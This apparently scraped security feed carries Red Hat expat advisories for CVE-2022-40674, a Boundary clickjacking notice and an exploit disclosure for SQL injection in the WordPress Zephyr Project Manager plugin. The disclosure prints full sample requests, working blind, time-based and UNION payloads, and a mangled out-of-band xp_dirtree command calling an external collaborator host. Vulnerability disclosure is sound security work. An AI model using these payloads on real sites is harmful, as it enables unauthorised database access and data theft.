expat-debuginfo-2.1.0-15.el7_9.i686.rpm  
expat-debuginfo-2.1.0-15.el7_9.x86_64.rpm  
expat-devel-2.1.0-15.el7_9.i686.rpm  
expat-devel-2.1.0-15.el7_9.x86_64.rpm  
expat-static-2.1.0-15.el7_9.i686.rpm  
expat-static-2.1.0-15.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
expat-2.1.0-15.el7_9.src.rpm

x86_64:  
expat-2.1.0-15.el7_9.i686.rpm  
expat-2.1.0-15.el7_9.x86_64.rpm  
expat-debuginfo-2.1.0-15.el7_9.i686.rpm  
expat-debuginfo-2.1.0-15.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64:  
expat-debuginfo-2.1.0-15.el7_9.i686.rpm  
expat-debuginfo-2.1.0-15.el7_9.x86_64.rpm  
expat-devel-2.1.0-15.el7_9.i686.rpm  
expat-devel-2.1.0-15.el7_9.x86_64.rpm  
expat-static-2.1.0-15.el7_9.i686.rpm  
expat-static-2.1.0-15.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
expat-2.1.0-15.el7_9.src.rpm

ppc64:  
expat-2.1.0-15.el7_9.ppc.rpm  
expat-2.1.0-15.el7_9.ppc64.rpm  
expat-debuginfo-2.1.0-15.el7_9.ppc.rpm  
expat-debuginfo-2.1.0-15.el7_9.ppc64.rpm  
expat-devel-2.1.0-15.el7_9.ppc.rpm  
expat-devel-2.1.0-15.el7_9.ppc64.rpm

ppc64le:  
expat-2.1.0-15.el7_9.ppc64le.rpm  
expat-debuginfo-2.1.0-15.el7_9.ppc64le.rpm  
expat-devel-2.1.0-15.el7_9.ppc64le.rpm

s390x:  
expat-2.1.0-15.el7_9.s390.rpm  
expat-2.1.0-15.el7_9.s390x.rpm  
expat-debuginfo-2.1.0-15.el7_9.s390.rpm  
expat-debuginfo-2.1.0-15.el7_9.s390x.rpm  
expat-devel-2.1.0-15.el7_9.s390.rpm  
expat-devel-2.1.0-15.el7_9.s390x.rpm

x86_64:  
expat-2.1.0-15.el7_9.i686.rpm  
expat-2.1.0-15.el7_9.x86_64.rpm  
expat-debuginfo-2.1.0-15.el7_9.i686.rpm  
expat-debuginfo-2.1.0-15.el7_9.x86_64.rpm  
expat-devel-2.1.0-15.el7_9.i686.rpm  
expat-devel-2.1.0-15.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64:  
expat-debuginfo-2.1.0-15.el7_9.ppc.rpm  
expat-debuginfo-2.1.0-15.el7_9.ppc64.rpm  
expat-static-2.1.0-15.el7_9.ppc.rpm  
expat-static-2.1.0-15.el7_9.ppc64.rpm

ppc64le:  
expat-debuginfo-2.1.0-15.el7_9.ppc64le.rpm  
expat-static-2.1.0-15.el7_9.ppc64le.rpm

s390x:  
expat-debuginfo-2.1.0-15.el7_9.s390.rpm  
expat-debuginfo-2.1.0-15.el7_9.s390x.rpm  
expat-static-2.1.0-15.el7_9.s390.rpm  
expat-static-2.1.0-15.el7_9.s390x.rpm

x86_64:  
expat-debuginfo-2.1.0-15.el7_9.i686.rpm  
expat-debuginfo-2.1.0-15.el7_9.x86_64.rpm  
expat-static-2.1.0-15.el7_9.i686.rpm  
expat-static-2.1.0-15.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
expat-2.1.0-15.el7_9.src.rpm

x86_64:  
expat-2.1.0-15.el7_9.i686.rpm  
expat-2.1.0-15.el7_9.x86_64.rpm  
expat-debuginfo-2.1.0-15.el7_9.i686.rpm  
expat-debuginfo-2.1.0-15.el7_9.x86_64.rpm  
expat-devel-2.1.0-15.el7_9.i686.rpm  
expat-devel-2.1.0-15.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
expat-debuginfo-2.1.0-15.el7_9.i686.rpm  
expat-debuginfo-2.1.0-15.el7_9.x86_64.rpm  
expat-static-2.1.0-15.el7_9.i686.rpm  
expat-static-2.1.0-15.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40674  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYz7sqdzjgjWX9erEAQjxyA//VKee7fxyq3Bih4oJvm9Lexgt4hgej3nR  
fJvpW6n+WTV6RRGtSSD37Lif1kav3bFiQBI4u2ZDrfEQ6ZETIcl6wKANdMI4zxYk  
Nh1CAxuWtnJsqQqu4pyViMT5pP5UgbO0suKps2TSTjq7f2Hok0IkLjEhqFlrfBA1  
owK2Pk6OltAvGKqLJuV9+MIgFGZNei5vuHCQwYS3V+CGXZpAnWwfRt69S2vRAOb0  
CB5eR4yF+IGn3eEebkArFEF97eGR9kqS4o63etEqMdoQ70FaPJKe9YM/y41Q/4gV  
/gD5H6caQk6ShO/O4UmabTw5TeiKzl7tJMxdYTd3rpBEZFNQiye45++4YY64+z0o  
uSNST+1PSz/8o+3XrpFKzs//ePLhYttC9/mLIIcVnrO1l3HTwKCP5rylMb/E3pJS  
Hc4QEUMw6orsFzNpMVtN9uiX23/Xzy1W4avKxlKSyf3PraXhiwz/GOz0R7mtaOKZ  
xH/8Pt3qKbOsCtmTx/SYx2ALqOm3jEC5s3zXfWjoFM6Um7wLYu1U2uWeuMHk5Hsu  
A2OADrOyY/88JODsLsugVVpvrAX0LrY8GOdXM1ZVRb2URdYL51bfQyEf2YEewplx  
x06H6MonBt/ZjLC4fba+v/yeM9TvdcDd7M7SgfEqwBniFhyTLUBWab00AR4t8ngY  
J17i8lcjGUc=IVzO  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6834-01

Red Hat Security Advisory 2022-6833-01 - Expat is a C library for parsing XML documents. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: expat security update  
Advisory ID:       RHSA-2022:6833-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6833  
Issue date:        2022-10-06  
CVE Names:         CVE-2022-40674  
====================================================================  
1. Summary:

An update for expat is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1) - aarch64, ppc64le, s390x, x86_64

3. Description:

Expat is a C library for parsing XML documents.

Security Fix(es):

* expat: a use-after-free in the doContent function in xmlparse.c  
(CVE-2022-40674)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, applications using the Expat library  
must be restarted for the update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c

6. Package List:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1):

Source:  
expat-2.2.5-3.el8_1.2.src.rpm

aarch64:  
expat-2.2.5-3.el8_1.2.aarch64.rpm  
expat-debuginfo-2.2.5-3.el8_1.2.aarch64.rpm  
expat-debugsource-2.2.5-3.el8_1.2.aarch64.rpm  
expat-devel-2.2.5-3.el8_1.2.aarch64.rpm

ppc64le:  
expat-2.2.5-3.el8_1.2.ppc64le.rpm  
expat-debuginfo-2.2.5-3.el8_1.2.ppc64le.rpm  
expat-debugsource-2.2.5-3.el8_1.2.ppc64le.rpm  
expat-devel-2.2.5-3.el8_1.2.ppc64le.rpm

s390x:  
expat-2.2.5-3.el8_1.2.s390x.rpm  
expat-debuginfo-2.2.5-3.el8_1.2.s390x.rpm  
expat-debugsource-2.2.5-3.el8_1.2.s390x.rpm  
expat-devel-2.2.5-3.el8_1.2.s390x.rpm

x86_64:  
expat-2.2.5-3.el8_1.2.i686.rpm  
expat-2.2.5-3.el8_1.2.x86_64.rpm  
expat-debuginfo-2.2.5-3.el8_1.2.i686.rpm  
expat-debuginfo-2.2.5-3.el8_1.2.x86_64.rpm  
expat-debugsource-2.2.5-3.el8_1.2.i686.rpm  
expat-debugsource-2.2.5-3.el8_1.2.x86_64.rpm  
expat-devel-2.2.5-3.el8_1.2.i686.rpm  
expat-devel-2.2.5-3.el8_1.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40674  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYz7sntzjgjWX9erEAQilzg/9G0hBlNyYGAOEQ2Wd1hoaviKz1x8xQSjk  
6Yp8hYteJ8barDPVG6ZSkOzK0EgwOU2BZem6D8s4jTF3SjYokQlC5qleON1kbV6v  
uegK8apoBsByZZVbpL3ioMcwT0jvoMJkmUhOrQmd8ijnWWBcQsmwVBCP8ej/YJcd  
ugtcxE9GIaXt/KCDg04ly+NaB21Ej2bvHC9IglajZyFglLESCs9aufQcEUIyyYN5  
KHjLdIxmUvs61FsROSB4GH22OABH6v7JAZwIQB3bVr1HVSpU6eUU2ug+DN/sELtk  
0wLZWTUk09V6I2uzF3Og40qsOUmgik5CSbeNrP5j/QAYz7Fys2HYs+ybx9zIMmlw  
t72+MCZO911IxV+CV2ev5qjluOgDcNDWJJVsvjSdiMpsK6d1xe7t224MYqHJLV5v  
93fRMoL//MmF0OMcgNrR8ijooUq1WrxJBIjQQ+imyNezvjevYPnWcl2sfTJIBZAH  
UHblj3RmjTmg9qEl/hxsWqYO+7o7CqzJ49nPxAzvu/F6SKR56SRZwsZnLt/awXLD  
SfO2ff2jZA7Ruq5kvfspzh9EYlsz4117uRlm4jtYXCtnlsR43v3bDPw50oTEgTvm  
OJMkFOVAN5uVSPttPacD0JaIDpeV26ofSakXknA4+lwle9hP1enX5nQ3qkne06Dq  
7vR0gnLs+t4=0lxG  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6833-01

Hashicorp Boundary versions prior to 0.9.1 suffer from a clickjacking vulnerability.

    # Exploit Title: Hashicorp Boundary < v0.9.1 - Clickjacking# Date: 07/08/2022# Exploit Author: Brandon Roach (V4quero)# Vendor Homepage: https://releases.hashicorp.com/boundary/# Software Link: https://github.com/hashicorp/boundary# Version: < v.0.9.1# Tested on: Linux# CVE: CVE-2022-36182Attackers can exploit this vulnerability to allow for the interception of login credentials, re-direction of users to malicious sites, or causing users to perform malicious actions on the site.Attack vector:to exploit the vulnerability, an attacker would frame the application and overlay hidden ui elements on the siteReferencehttps://owasp.org/www-community/attacks/Clickjacking

Hashicorp Boundary Clickjacking

WordPress Zephyr Project Manager plugin version 3.2.42 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi# Date: 14-08-2022# Exploit Author: Rizacan Tufan# Blog Post: https://rizax.blog/blog/wordpress-plugin-zephyr-project-manager-multiple-sqli-authenticated# Software Link: https://wordpress.org/plugins/zephyr-project-manager/# Vendor Homepage: https://zephyr-one.com/# Version: 3.2.42# Tested on: Windows, Linux# CVE : CVE-2022-2840 (https://wpscan.com/vulnerability/13d8be88-c3b7-4d6e-9792-c98b801ba53c)# DescriptionZephyr Project Manager is a plug-in that helps you manage and get things done effectively, all your projects and tasks.It has been determined that the data coming from the input field in most places throughout the application are used in=20the query without any sanitize and validation.The details of the discovery are given below.# Proof of Concept (PoC)=20The details of the various SQL Injection on the application are given below.## Endpoint of Get Project Data.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_projectsContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 74Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersaction=3Dzpm_view_project&project_id=3D1&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: project_id (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: action=3Dzpm_view_project&project_id=3D1 AND 4923=3D4923&zpm_nonce=3D22858bf3a7    Type: time-based blind    Title: MySQL >=3D 5.0.12 OR time-based blind (query SLEEP)    Payload: action=3Dzpm_view_project&project_id=3D1 OR (SELECT 7464 FROM (SELECT(SLEEP(20)))EtZW)&zpm_nonce=3D22858bf3a7    Type: UNION query    Title: Generic UNION query (NULL) - 20 columns    Payload: action=3Dzpm_view_project&project_id=3D-4909 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a7071,0x6264514e6e4944795a6f6e4a786a6e4d4f666255434d6a5553526e43616e52576c75774743434f67,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&zpm_nonce=3D22858bf3a7---## Endpoint of Get Task Data.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasksContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 51Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailerstask_id=3D1&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: task_id (POST)    Type: time-based blind    Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)    Payload: task_id=3D1 AND (SELECT 5365 FROM (SELECT(SLEEP(20)))AdIX)&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7---## Endpoint of New Task.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasksContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 337Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailerstask_name=3Dtest&task_description=3Dtest&task_project=3D1&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Dtest&type=3Ddefault&recurrence%5Btype%5D=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: task_project (POST)    Type: time-based blind    Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)    Payload: task_name=3Dtest&task_description=3Dtest&task_project=3D1 AND (SELECT 3078 FROM (SELECT(SLEEP(20)))VQSp)&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Drrrr-declare-q-varchar-99-set-q-727aho78zk9gcoyi8asqud6osfy9m0io9hx9kz8o-oasti-fy-com-tny-exec-master-dbo-xp-dirtree-q&type=3Ddefault&recurrence[type]=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7---

Tag

#linux